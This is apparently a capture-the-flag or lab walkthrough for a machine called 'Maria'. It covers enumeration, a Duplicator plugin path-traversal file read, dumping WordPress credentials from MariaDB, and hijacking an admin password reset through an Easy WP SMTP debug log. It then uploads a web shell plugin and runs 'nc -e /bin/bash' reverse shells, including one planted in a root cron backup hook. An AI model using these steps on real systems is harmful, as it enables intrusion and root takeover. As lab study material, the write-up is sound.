Maria
Enumeration
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 5 0 0 4096 Sep 21 2018 automysqlbackup
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Maria
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1$ wpscan --url http://192.168.153.167/ --api-token [REDACTED]
[+] WordPress version 5.7.1 identified
[I] duplicator v1.3.26
[I] easy-wp-smtp v1.4.1$ searchsploit wordpress easy wp smtp
Unpatched WordPress Easy WP SMTP installs version 1.4.2 or earlier. - Sensitive Data Exposure
$ searchsploit wordpress duplicator
Wordpress Plugin Duplicator 1.3.26 - Unauthentica | php/webapps/49288.rb
Exploit: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)EASY WP SMTP - https://www.exploit-db.com/exploits/50420
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + filehttps://www.howtoforge.com/creating-mysql-backups-with-automysqlbackup-on-ubuntu-9.10
> set FILEPATH /etc/default/automysqlbackup
# Username to access the MySQL server e.g. dbuser
USERNAME=backup
# Username to access the MySQL server e.g. password
PASSWORD=[REDACTED]
# Host name (or IP address) of MySQL server e.g localhost
DBHOST=localhost$ mysql --host=192.168.153.167 -u backup -p
MariaDB [wordpress]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| admin | $P$[REDACTED] |
+------------+------------------------------------+
1 row in set (0.145 sec)I could not crack the password with rockyou.
With the other exploit, we can use mysql to identfiy the log file to get admin reset link.
Wordpress -> Forgot password -> admin
MariaDB [wordpress]> select option_value from wp_options where option_name = 'swpsmtp_options';
...
"enable_debug";i:1
"log_file_name";s:27:"618690b555268_debug_log.txt";}> set FILEPATH /var/www/html/wordpress/wp-content/plugins/easy-wp-smtp/618690b555268_debug_log.txt
CLIENT -> SERVER: http://192.168.117.167/wp-login.php?action=rp&key=IRYLUQIp7Pl9LHhLkdbr&login=adminOpen the link, reset the admin password. Then login with new password.
Initial Access
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ sudo zip plugin-shell.zip plugin-shell.phpPlugins -> Add New -> Upload Plugin -> Browse -> plugin-shell.zip -> Install Now
http://192.168.117.167/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=nc%20-e%20/bin/bash%20192.168.49.117%2080PrivEsc
/etc/cron.d/automysqlbackup
www-data@maria:/var/mail$ cat /etc/cron.d/automysqlbackup
*/1 * * * * root /usr/sbin/automysqlbackup
cat /etc/default/automysqlbackup
# Command run after backups (uncomment to use)
POSTBACKUP=/var/www/html/wordpress/backup_scripts/backup-postcat << EOF > /var/www/html/wordpress/backup_scripts/backup-post
> /bin/bash -c '/usr/bin/nc -e /bin/bash 192.168.49.117 80'
> EOF
chmod +x /var/www/html/wordpress/backup_scripts/backup-postLast updated